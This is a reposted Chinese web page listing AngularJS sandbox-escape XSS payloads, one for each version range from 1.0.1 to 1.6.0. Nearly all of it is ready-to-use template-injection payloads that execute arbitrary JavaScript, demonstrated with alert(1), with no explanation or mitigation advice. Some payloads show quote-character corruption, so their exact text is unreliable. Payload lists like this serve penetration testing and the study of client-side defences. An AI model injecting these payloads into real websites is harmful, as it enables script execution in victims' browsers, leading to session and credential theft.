首页 > Web开发 > 详细

AngularJs XSS沙箱绕过payload

时间:2020-03-30 21:49:05      阅读:84      评论:0      收藏:0      [点我收藏+]
AngularJs  XSS沙箱绕过payload
 

1.0.1 - 1.1.5 

{{constructor.constructor(alert(1))()}} 

1.2.0 - 1.2.1 

{{a=constructor;b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,alert(1))()}}

1.2.2 - 1.2.5

{{a[{toString:[].join,length:1,0:__proto__}].charAt=‘‘.valueOf;$eval("x=‘"+(y=if(!window\\u002ex)alert(window\\u002ex=1))+eval(y)+"");}}

1.2.6 - 1.2.18

{{(_=‘‘.sub).call.call({}[$=constructor].getOwnPropertyDescriptor(_.__proto__,$).value,0,alert(1))()}}

1.2.19 - 1.2.23

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29

{{a.constructor.prototype.charAt=‘‘.valueOf;$eval("x=‘\"+(y=‘if(!window\\u002ex)alert(window\\u002ex=1)‘)+eval(y)+\"‘");}}   

1.3.0

{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(‘‘+‘‘.toString(
F = Function.prototype; +
F.apply = F.a; +
delete F.a; +
delete F.valueOf; +
alert(1);
))
);}} 

1.3.1 - 1.3.2

{{
{}[{toString:[].join,length:1,0:__proto__}].assign=[].join;
a.constructor.prototype.charAt=‘‘.valueOf; 
$eval(x=alert(1)//); 
}}

1.3.3 - 1.3.18

{{{}[{toString:[].join,length:1,0:__proto__}].assign=[].join; 

a.constructor.prototype.charAt=[].join;
$eval(x=alert(1)//); }}

 

1.3.19

{{
a[{toString:false,valueOf:[].join,length:1,0:__proto__}].charAt=[].join; 
$eval(x=alert(1)//); 
}}

 

1.3.20 

{{a.constructor.prototype.charAt=[].join;$eval(x=alert(1));}}

1.4.0 - 1.4.9

{{a.constructor.prototype.charAt=[].join;$eval(x=1} } };alert(1)//);}}

1.5.0 - 1.5.8 

{{x = {y:‘‘.constructor.prototype}; x[y].charAt=[].join;$eval(x=alert(1));}}

1.5.9 - 1.5.11

{{
    c=‘‘.sub.call;b=‘‘.sub.bind;a=‘‘.sub.apply;
    c.$apply=$apply;c.$eval=b;op=$root.$$phase;
    $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
    C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
    B=C(b,c,b);$evalAsync("
    astNode=pop();astNode.type=UnaryExpression;
    astNode.operator=(window.X?void0:(window.X=true,alert(1)))+;
    astNode.argument={type:Identifier,name:foo};
    ");
    m1=B($$asyncQueue.pop().expression,null,$root);
    m2=B(C,null,m1);[].push.apply=m2;a=‘‘.sub;
    $eval(a(b.c));[].push.apply=a;
}}

1.6.0

{{constructor.constructor(alert(1))()}} 

 

AngularJs XSS沙箱绕过payload

原文:https://www.cnblogs.com/Eleven-Liu/p/12600961.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!